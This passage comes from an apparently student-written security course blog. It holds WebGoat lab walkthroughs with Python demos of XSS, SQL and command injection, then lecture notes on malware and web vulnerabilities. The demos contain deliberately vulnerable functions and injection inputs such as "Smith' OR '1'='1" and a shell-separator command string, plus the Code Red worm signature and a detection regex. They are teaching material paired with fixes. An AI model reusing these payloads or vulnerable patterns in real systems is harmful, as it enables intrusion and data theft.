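                "Pass:<input name=p type=password><input type=submit value=Login></form>")

# Tags that must never come from user input; used only to judge the rendered output.
INJECTED_TAG_RE = re.compile(r"<(script|img|form|iframe)\b", re.IGNORECASE)


def render_vulnerable(query):
    """No output encoding: whatever the user typed becomes part of the page's markup."""
    return PAGE_TEMPLATE.format(query=query)


def render_naive_filter(query):
    """Blocklist 'protection': removes literal <script> tags and nothing else."""
    cleaned = query.replace("<script>", "").replace("</script>", "")
    return PAGE_TEMPLATE.format(query=cleaned)


def render_safe(query):
    """Output encoding: < > & " ' become entities, so the input can only ever be text."""
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


def is_injected(page):
    """True if the rendered page contains a tag that could only have come from the input."""
    return INJECTED_TAG_RE.search(page) is not None


if __name__ == "__main__":
    for name, render in [("vulnerable", render_vulnerable),
                         ("naive filter", render_naive_filter),
                         ("escaped", render_safe)]:
        for label, payload in [("script", SCRIPT_PAYLOAD), ("mixed-case", CASE_PAYLOAD),
                               ("img onerror", EVENT_HANDLER_PAYLOAD), ("phishing form", FORM_PAYLOAD)]:
            print(f"{name:13} {label:14} injected={is_injected(render(payload))}")
```

The blocklist stops the one payload it was written for and nothing else, which is exactly the situation task 7 asks you to find; encoding at the point of output stops all four, because the browser is never given a reason to treat the input as markup.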




Injection Flaws
Task
1. This lesson will show you how SQL injection is applied to an application system.
2. Click on the Injection Flaws | Numeric SQL Injection menu, refer to the figure below

3. From the combo list choose a weather station and click the [Go!] button (do not forget to click the [Accept changes] button in the Edit Request window); you will get the information for the station you selected.
4. To apply the injection flaw you need to choose a new station and click the [Go!] button. Before clicking the [Accept changes] button in the Edit Request window, in the [URLEncoded] tab, append to the value of the station variable

5. Once the value is changed, click the [Accept changes] button. The entire table is displayed on the screen. This shows that by manipulating an input field that is not properly validated we can display the entire contents of the database table.

6. Repeat this task on Injection Flaws | String SQL Injection. Use the right input for this problem and compare the result. (Hint: the input should be a string, so the injected text has to close the quote the application puts around it.)
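What the two lessons do to the server's query is easiest to see with a real database engine, so here is an added example (my code, not WebGoat's) using an in-memory SQLite copy of the weather_data and user_data tables with constructed rows. The "vulnerable" functions build the query text the way the lesson's application does; the "safe" ones validate the type and bind the value as a parameter, so the same inputs either return nothing or are rejected before any SQL runs. The station IDs, names and card numbers are made up for the demo.

```python
import sqlite3


def build_db():
    """In-memory stand-in for WebGoat's weather_data and user_data tables (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE weather_data (station INTEGER, name TEXT, state TEXT,"
                 " min_temp INTEGER, max_temp INTEGER)")
    conn.executemany("INSERT INTO weather_data VALUES (?,?,?,?,?)", [
        (101, "Columbia", "MD", 55, 70),
        (102, "Seattle", "WA", 46, 53),
        (103, "New York", "NY", 58, 66),
        (104, "Houston", "TX", 72, 84),
    ])
    conn.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT,"
                 " cc_number TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?,?,?,?)", [
        (101, "Joe", "Snow", "987654321"),
        (102, "John", "Smith", "2234200065411"),
        (103, "Jane", "Plane", "123456789"),
    ])
    return conn


def station_vulnerable(conn, station):
    """Numeric SQL injection: the request value is pasted straight into the query text."""
    sql = f"SELECT * FROM weather_data WHERE station = {station}"
    return conn.execute(sql).fetchall()


def station_safe(conn, station):
    """Validate the type, then bind it as a parameter; the value can never alter the SQL."""
    try:
        station_id = int(station)
    except (TypeError, ValueError):
        raise ValueError("station must be an integer")
    return conn.execute("SELECT * FROM weather_data WHERE station = ?", (station_id,)).fetchall()


def user_vulnerable(conn, last_name):
    """String SQL injection: a quote in the input closes the literal and the rest is SQL."""
    sql = f"SELECT * FROM user_data WHERE last_name = '{last_name}'"
    return conn.execute(sql).fetchall()


def user_safe(conn, last_name):
    """The quote is just another character in a bound string; no name contains it, so no rows."""
    return conn.execute("SELECT * FROM user_data WHERE last_name = ?", (last_name,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(station_vulnerable(db, "101"))            # one station, as intended
    print(station_vulnerable(db, "101 OR 1=1"))     # every station: WHERE is always true
    print(user_vulnerable(db, "Smith' OR '1'='1"))  # every user, card numbers included
    print(user_safe(db, "Smith' OR '1'='1"))        # []
```

The numeric lesson has no quotes to escape, which is why "101 OR 1=1" works as-is; the string lesson wraps the value in quotes, so the payload has to open with one. Parameter binding removes the distinction entirely, because the value is sent to the engine separately from the statement.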


Malicious File Execution
Task
1. This lesson will show you how malicious file execution / command injection is applied to an online application system.
2. Click on the Injection Flaws | Command Injection menu, refer to the figure below

3. By choosing a lesson plan to view and clicking the [View] button, the user is shown the content of the lesson. This exercise manipulates the input field by appending a command-line instruction to the input.
4. Select a new lesson and click [View]. Before clicking the [Accept changes] button, add the following command to your HelpFile variable value

5. Once you click the [Accept changes] button, the following output will be displayed on the screen.
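The HelpFile parameter ends up inside a command line that the server hands to a shell, which is the whole flaw. Here is an added example (my code, not WebGoat's) of a help-file viewer written both ways: the vulnerable version builds a shell command from the parameter, so a separator character in the request runs a second command; the hardened version validates the name against an allowlist, confines the resolved path to the help directory and reads the file without any shell. The two .help files are constructed in a temporary directory; the vulnerable version uses "cat" through /bin/sh, so that half assumes a POSIX host (the Windows lab server does the same thing with "cmd /c type").

```python
import os
import re
import subprocess
import tempfile

# Constructed help directory with two lesson files standing in for WebGoat's .help files.
HELP_DIR = tempfile.mkdtemp(prefix="webgoat_help_")
for _name, _body in {
    "BasicAuthentication.help": "Lesson: HTTP Basic Authentication\n",
    "CommandInjection.help": "Lesson: OS Command Injection\n",
}.items():
    with open(os.path.join(HELP_DIR, _name), "w") as _fh:
        _fh.write(_body)

# Allowlist: a bare file name made of word characters, ending in .help. Nothing else.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_]+\.help$")


def view_help_vulnerable(help_file):
    """The WebGoat pattern: build a shell command line from the HelpFile parameter.

    Runs 'cat' through the shell (POSIX assumed), so every shell metacharacter in
    the request ( ; & | ` $() ) is interpreted, not treated as part of the name.
    """
    cmd = f"cat {HELP_DIR}/{help_file}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def view_help_safe(help_file):
    """Allowlist the name, confine the path, and never involve a shell at all."""
    if not SAFE_NAME_RE.match(help_file):
        raise ValueError(f"rejected help file name: {help_file!r}")
    path = os.path.realpath(os.path.join(HELP_DIR, help_file))
    if os.path.dirname(path) != os.path.realpath(HELP_DIR):
        raise ValueError("path escapes the help directory")
    with open(path) as fh:
        return fh.read()


if __name__ == "__main__":
    injected = "BasicAuthentication.help; echo INJECTED; uname -a"   # constructed payload
    print(view_help_vulnerable(injected))    # lesson text, then the attacker's commands
    try:
        view_help_safe(injected)
    except ValueError as err:
        print("hardened viewer:", err)
```

The fix is not to escape the separators but to stop calling a shell: once the file name can only be one of a few known shapes and the read goes through open(), there is no command line left for the request to alter.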



At first I really didn't understand.. then I watched the other guys doing it.. so far OK laaa... just pretend to understand.. yuhuuu.... As usual, finish the review questions..


alhamdulillah...


"Worry is like a rocking chair -- it gives you something to do but doesn't get you anywhere.."


Lecture 5 ~Program Security~

Assalamualaikum w.b.t...

In Lecture 5 we learned the Program Security chapter... Topics in this lecture:-
~Vulnerabilities
•Secure Program
•Malicious Code
•Top 10 Web application vulnerabilities
~Safeguard to Program threat
~Pillar to Software Security


Secure Programs
~Different people have different perspectives on software quality.
~Tracking faults (from the developer's side):
•Requirements
•Design
•Code inspections. Note: fixing a fault might introduce more faults
~Failures are the effects of faults
~Vulnerabilities and flaws do not map one-to-one onto faults and failures
~"Bug" means different things depending on context.
~IEEE says a "fault" is the inside view from the developer; a "failure" is the outside view from the user
~Types of Flaws:
•validation error
•domain error
•serialization and aliasing
•inadequate identification and authentication
•boundary condition violation
•other exploitable logic errors


Nonmalicious Program Errors
~Buffer Overflows
•Accidentally not checking array bounds (example C program)

~Incomplete Mediation - data exposed or uncontrolled; every value in this URL, including the price and the total, is supplied by the client:
http://www.testing.com/order.asp?cutID=115&part=666&qty=3&price=500&total=1500
~Time of Check to Time of Use
•the gap between checking a value and executing the instruction that uses it lets the value be changed in between
•Process all the data in local storage rather than a shared area such as the clipboard.
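The order URL above is the classic incomplete-mediation case, so here is an added example (my code, not from the lecture) of the same order handled two ways: a handler that trusts every query field, and one that treats the URL as untrusted input, validates the part and quantity, recomputes the price and total from a server-side catalog and refuses a request whose client-supplied price disagrees. The catalog, the tampered URL and the field name custID are assumptions for the demo.

```python
from urllib.parse import parse_qs, urlsplit

# Server-side catalog: the only authoritative source of prices (constructed for the demo).
CATALOG = {"666": 500, "667": 1250}
MAX_QTY = 100

EXAMPLE_URL = "http://www.testing.com/order.asp?custID=115&part=666&qty=3&price=500&total=1500"
# The same order after the customer edits the address bar: 3 units for 3 currency units.
TAMPERED_URL = "http://www.testing.com/order.asp?custID=115&part=666&qty=3&price=1&total=3"


class OrderError(ValueError):
    pass


def parse_order(url):
    """Return the query string as {name: first_value}."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def charge_unmediated(url):
    """Incomplete mediation: trusts every field the client sent, including the total."""
    order = parse_order(url)
    return int(order["total"])


def charge_mediated(url):
    """Validate what must be validated, recompute what the server already knows,
    and ignore client fields the server has no business trusting."""
    order = parse_order(url)
    part = order.get("part")
    if part not in CATALOG:
        raise OrderError(f"unknown part {part!r}")
    try:
        qty = int(order.get("qty", ""))
    except ValueError:
        raise OrderError("qty is not an integer")
    if not 1 <= qty <= MAX_QTY:
        raise OrderError(f"qty {qty} out of range")
    price = CATALOG[part]                  # never the client's price
    total = price * qty                    # never the client's total
    # If the client did send a price, a mismatch is evidence of tampering: reject loudly.
    if "price" in order:
        try:
            claimed = int(order["price"])
        except ValueError:
            raise OrderError("price is not an integer")
        if claimed != price:
            raise OrderError(f"client price {claimed} does not match catalog price {price}")
    return total


if __name__ == "__main__":
    print("unmediated, tampered URL charges:", charge_unmediated(TAMPERED_URL))
    print("mediated, genuine URL charges:", charge_mediated(EXAMPLE_URL))
    try:
        charge_mediated(TAMPERED_URL)
    except OrderError as err:
        print("mediated, tampered URL rejected:", err)
```

The point is not the arithmetic but where the numbers come from: anything the browser can see in the URL, a hidden form field or a cookie can be rewritten before it is sent, so the server must either recompute it or check it against data it already holds.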


Viruses and Other Malicious Code
•Programs work on data, and users usually don't see the raw data.
•Malicious users can make programs that access data and other programs beyond what was intended.
•Malicious code can do harm.
•Malicious code has been around for a long time (the 70's).
•Malicious code can also be accidental.


Malicious Code
~unanticipated or undesired effects in programs, generated with the intent of doing damage
~damage could be in the form of:
•modification/destruction
•stolen data
•unauthorized access
•damage to the system
•other forms not intended by users


Viruses and ”Malicious Programs”
•Computer “Viruses” and related programs have the ability to replicate themselves
on an ever increasing number of computers. They originally spread by people
sharing floppy disks. Now they spread primarily over the Internet (a “Worm”).

•Other “Malicious Programs” may be installed by hand on a single machine. They may
also be built into widely distributed commercial software packages. These are
very hard to detect before the payload activates (Trojan Horses, Trap Doors, and
Logic Bombs).


Taxonomy of Malicious Programs



Examples of malicious code:
~Trojan Horse - a program which performs a useful function, but also performs an unexpected action as well.
~Virus - a code segment which replicates by attaching copies of itself to existing executables.
•Transient - only executes when the program that it is attached to runs.
•Resident - once the program executes, the virus stays in memory until it gets triggered again. Terminate and Stay Resident (TSR).
•Worm - a program which replicates itself and causes execution of the new copy.
•Bacteria - replicates until it fills all disk space or consumes all CPU cycles
•Logic bomb - malicious code that activates on an event (e.g., a date).
•Trap Door (or Back Door) - an undocumented entry point written into code for debugging that can let in unwanted users.
~Spyware - relatively new; can be non-malicious or malicious.
•Can steal your information (identity theft). This is done with a keystroke logger, and even if you use encryption on your connections the damage is already done before the data is sent.
•Can steal your email addresses
•Can see what web sites you visit
•Can see the contents of files
•Pop-up ads
•Slows down your computer
•Crashes your computer



Viruses
~Personal computer viruses exploit the lack of effective access controls in these
systems
•modify files and OS itself
~Characteristics of a virus:
•replication
•requires a host program as a carrier
•activated by external action
•replication limited to (virtual) system
~Viruses are currently designed to attack single platforms.
~A virus can be referred to, for example, as an IBM-PC virus (referring to the
hardware) or a DOS virus (referring to the operating system).
~The unexpected and uncontrollable replication of viruses makes them so dangerous.


How Viruses Attach
~Append viruses - execute first, then transfer control to the original program.
~Surround viruses - have control before and after the regular program.
~Integrated viruses - replace some of the target program or all of the target and
give the effect that the target program worked.


Virus Appended to a Program



How Viruses Gain Control
~The virus needs to have the CPU execute it to be in control.
~One way is to overwrite the program on the disk.
~Another is to move the original program and then after the CPU executes it then
transfer control to the program.
~Another is to install itself in memory and change the pointers of the operating
system or interrupt table to point to it.


Homes for Viruses
•Install itself in the boot sector (MBR) master boot record.
•Memory resident virus - (TSR) terminate and stay resident.
•Other homes such as applications like word processors and spread sheets and even
attachments to email.
•Even attachments to vendor distributed programs or games.


Types of Viruses
Parasitic Virus - attaches itself to executable files as part of their code. Runs whenever the host program runs.

Memory-resident Virus - Lodges in main memory as part of the residual operating system.

Boot Sector Virus - infects the boot sector of a disk, and spreads when the operating system boots up (original DOS viruses).

Stealth Virus - explicitly designed to hide from Virus Scanning programs.

Polymorphic Virus - mutates with every new host to prevent signature detection.


Truths and Misconceptions About Viruses
•Although other computers/operating systems are vulnerable to Viruses, it seems the
mentality of the programmers of Viruses is more common on PCs.
•Viruses can modify hidden and read only files. True
•Viruses can appear only in data files or Word docs, or in programs. False
•Viruses spread only on disks or in e-mail. False
•Viruses cannot live in memory when the computer is shut off, but they can still be
on other storage devices. Also, a reboot (warm start) is vulnerable to viruses in
memory. True
•Viruses cannot infect hardware. True
•Viruses can be malevolent, benign, or benevolent. True


How Worms Attack




Worms
~Characteristics of a worm:
•self-contained, do not require a host
•replication
•activated by creating process
•for network worms, replication occurs across communication links
~Worms exploit flaws in the operating system or inadequate system management to
replicate.
~Release of a worm usually results in brief but spectacular outbreaks, shutting down
entire networks.
~Protection against Worms
•requires a combination of basic system security and good network security
•add-on tools:
*configuration review tools
*checksum-based change detection tools
*intrusion detection tools
•network security tools:
*wrapper program : filter network connections
*firewall system
~The most important means of defense is the identification & authentication (I&A)
controls, which are usually integrated into the system. If poorly managed, these
controls become a vulnerability which is easily exploited.



Targeted Malicious Code
~The previous notes have dealt with anonymous code not targeted to a specific
system, application or a particular purpose.
~Trapdoors - secret, undocumented entry point into a module or program.
~Salami Attack


Trapdoors and the Salami Attack
~Trapdoors are often caused by programmers leaving debug routines in the code, or by
failure to check array bounds, which lets code overrun the array and get
placed on the stack.
~Causes of Trapdoors:
•Programmer forgets to remove them.
•Programmer intentionally leaves them in for testing.
•Leaves them in intentionally for maintenance of the finished product.
•Leaves them in for later covert means of access.
~Salami attacks refer to the simple fact that, when dealing with real numbers, the
computer has a fixed size and will perform rounding or truncation. There will
always be those programmers who will try to conceal the small amounts in the hope
that humans will not notice.
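The rounding residue described above, shown with a reconciliation control that makes it visible. This is an added example, not part of the lecture notes; the balances, rate, account names and function names are constructed for the illustration.

```python
# Added example (not from the lecture notes): the rounding residue a salami
# attack lives in, and a reconciliation control that makes it visible. Interest
# is computed with Decimal, so rounding is explicit and exact, and the fractions
# of a cent dropped by truncation are accumulated instead of silently vanishing.
# Balances, rate and account names are constructed for the illustration.
from decimal import Decimal, ROUND_DOWN

CENT = Decimal("0.01")


def apply_interest(balances, rate):
    """Return (credit per account truncated to whole cents, total truncated residue)."""
    credits = {}
    residue = Decimal("0")
    for account, balance in balances.items():
        exact = Decimal(balance) * Decimal(rate)
        credit = exact.quantize(CENT, rounding=ROUND_DOWN)
        credits[account] = credit
        residue += exact - credit  # the "slice" a salami attack would divert
    return credits, residue


def reconcile(balances, rate, credits, suspense_posting):
    """Control: exact interest owed must equal credits paid plus the residue
    posted to a suspense account. If any part of the residue was diverted
    elsewhere, the books no longer balance and the check fails."""
    exact_total = sum(Decimal(b) * Decimal(rate) for b in balances.values())
    return exact_total == sum(credits.values()) + suspense_posting


# Constructed ledger: three balances and a 1.25% interest rate.
BALANCES = {"A": "1234.56", "B": "98.77", "C": "10000.01"}
RATE = "0.0125"
```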



Top 10 web app vulnerabilities
~Attacks associated with program errors
•Cross site scripting
•Injection flaws
•Malicious file execution
•Insecure direct object reference
•Cross site request forgery
•Information leakage and improper error handling
•Broken authentication and session management
•Insecure crypto storage
•Insecure communications
•Failure to restrict URL access



Virus Signatures
~Virus cannot be completely invisible but can be very hard to detect, especially if
it has self-modifying code.
~The code it executes can be identified and a program can scan for the tell-tale
code.
~Usually it is at the start of a program or maybe a test and jump to code at the
bottom of the file.
~If the virus writer wants to keep the program size the same to prevent detection
then it has to replace some of the program code.
~But a good scanner with a checksum can detect the changes in the code.


Example of Code Red worm signature
GET/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
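Matching the signature above against web server log lines, as an added example that is not part of the lecture notes. The log lines and client addresses are constructed (documentation address ranges); the pattern is the GET for /default.ida, the long run of "N" characters and the first %u-encoded bytes shown in the signature.

```python
# Added example (not from the lecture notes): scanning web server log lines for
# the Code Red request signature shown above. The match requires a GET for
# /default.ida, a long run of "N" characters and the %u-encoded bytes that
# open the payload; a short probe that only hits /default.ida is not flagged.
# Log lines and client addresses below are constructed (documentation ranges).
import re

CODE_RED_RE = re.compile(r'GET\s*/default\.ida\?N{100,}%u9090%u6858%ucbd3%u7801')

# The query string from the signature, with the run of N's rebuilt programmatically.
CODE_RED_QUERY = ("/default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090"
                  "%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")


def build_sample_log():
    """Constructed common-log-format lines: a normal request, two Code Red hits, a short probe."""
    return [
        '192.0.2.10 - - [19/Jul/2001:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043',
        '192.0.2.77 - - [19/Jul/2001:10:01:05 +0000] "GET %s HTTP/1.0" 404 0' % CODE_RED_QUERY,
        '192.0.2.10 - - [19/Jul/2001:10:01:09 +0000] "GET /default.ida?NNNN HTTP/1.0" 404 0',
        '198.51.100.5 - - [19/Jul/2001:10:02:11 +0000] "GET %s HTTP/1.0" 404 0' % CODE_RED_QUERY,
    ]


def find_code_red_hits(lines):
    """Return (client_ip, line_number) for every line matching the signature."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if CODE_RED_RE.search(line):
            hits.append((line.split()[0], number))
    return hits
```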


The Source of Viruses
•Virus program can be small so it hides very easily in a large program.
•Might hide in a compiler, a data base manager or a file manager.
•The number one spot is an attachment to email or some public download file.


Virus Phases
•Dormant phase - the virus is idle
•Propagation phase - the virus places an identical copy of itself into other
programs
•Triggering phase - the virus is activated to perform the function for which it was
intended
•Execution phase - the function is performed



Preventing Virus Infection
~Protection against viruses
•detection tools
*example : scanners, vulnerability monitors, modification detection programs
•identification tools
*example : scanners
•removal tools
*example : disinfectors
~Scanners and disinfectors are the most popular classes of anti-virus software.
~Personal and administrative practices and institutional policies with regard to
shared or external software usage should form the first line of defense.
~Ways to prevent Virus infections
•Use only commercial software acquired from reliable, well established vendors.
•Test all new software on an isolated computer.
•Do not put a floppy disk in the machine unless it has been scanned first.
•Do not open attachments to email unless they have been scanned, including turning
off the auto-open of attachments in mail readers.
•Scan any downloaded files before they are run.
•At least once a week update the virus signature data files.
~Make a bootable disk with a virus scan program on it and write protected.
~Make and retain backup copies of executable system files in the event the virus
detection program can't remove the virus.


Preventing Web application attack
•Input validation.
•Strong output encoding.
•Do not use "blacklist" validation.
•Do not use GET requests (URLs) for sensitive data or to perform value transactions.
•Disable or limit detailed error handling.
•Ensure errors from all layers are adequately checked and configured to prevent error
messages from being exploited by intruders.
•Do not allow the login process to start from an unencrypted page.
•Encrypt passwords.
•Check the old password when the user changes to a new password.
•Do not create your own cryptographic algorithms.
•Do not use weak algorithms.
•Ensure the access control matrix is part of the business, architecture, and design
of the application.
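The first two controls in the list (input validation and strong output encoding) next to the "blacklist" validation the list advises against, as an added example that is not part of the lecture notes. The field being validated (a display name), the regular expressions and the function names are made up for the illustration.

```python
# Added example (not from the lecture notes): allowlist input validation and
# output encoding, the first two controls in the list, next to the blocklist
# check the notes advise against. The field (a display name) and the function
# names are made up for the illustration.
import html
import re

# Blocklist: rejects only the spellings of a bad token its author thought of.
BLOCKLIST = re.compile(r"<script>", re.IGNORECASE)

# Allowlist: a display name is 1-40 characters drawn only from this set; anything
# else is rejected, so there is no list of bad inputs to keep up to date.
DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9 ._'-]{1,40}")


def blocklist_validate(value):
    """Accept unless a known-bad token is present (the weak approach)."""
    return BLOCKLIST.search(value) is None


def allowlist_validate(value):
    """Accept only if every character is in the allowed set."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None


def render_greeting(display_name):
    """Output encoding: escape before the value is placed inside HTML,
    regardless of what validation happened earlier."""
    return "<p>Hello, %s!</p>" % html.escape(display_name, quote=True)


# Constructed inputs: the second contains no literal "<script>" and so passes
# the blocklist but fails the allowlist; the first and third are legitimate.
SAMPLE_INPUTS = ["Alice", "<img src=x onerror=alert(1)>", "O'Brien"]
```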


Controls Against Program Threats
•Software Engineering
•Modularity, Encapsulation, and Information Hiding
•Peer reviews
•Hazard Analysis HAZOP, FMEA, FTA
•Independent Testing
•Good Design
•Prediction
•Static Analysis
•Configuration Management
•Proofs of Program Correctness
•Operating System Controls - trusted software, confinement, audit log
•Administrative Controls - Standards of program development


Pillars of software security
•Risk Management
•Touchpoints
•Knowledge


Risk Management
•Business understands the idea of risk, even software risk
~Technical perfection is impossible
~There is no such thing as 100% security
•Perfect quality is a myth
•Technical problems do not always spur action
~Answer the "So what?" question explicitly
•Help users understand what they should do about risk
•Build better software


Touchpoints



Knowledge catalog
~Principles
~Guidelines
~Rules
~Attack patterns
~Vulnerabilities
~Historical Risks


Summary of Program Threats and Controls
~Malicious code gets a lot of publicity, but don't let media attention distract you
from the seriousness of the threat.
~There is no real way to measure the amount of damage that malicious code can do.
All one can do is estimate, and that is only for the discovered programs; what
about the ones that haven't been discovered or haven't been executed, or worse, the
ones that haven't been written yet?



Summary
~Viruses come in different forms
~Some are mere nuisances, some come with devastating consequences
~E-mail worms are self-replicating and clog the networks with unwanted traffic
~Virus codes are not necessarily complex
~It is necessary to scan the systems/networks for infections on a periodic basis for
protection against viruses
~Antidotes to new virus releases are promptly made available by security companies,
and these form the major countermeasure.


That's some of what we learned in this lecture... Just enjoy!...


alhamdulillah...


"Learn to enjoy little things -- there are so many of them.."
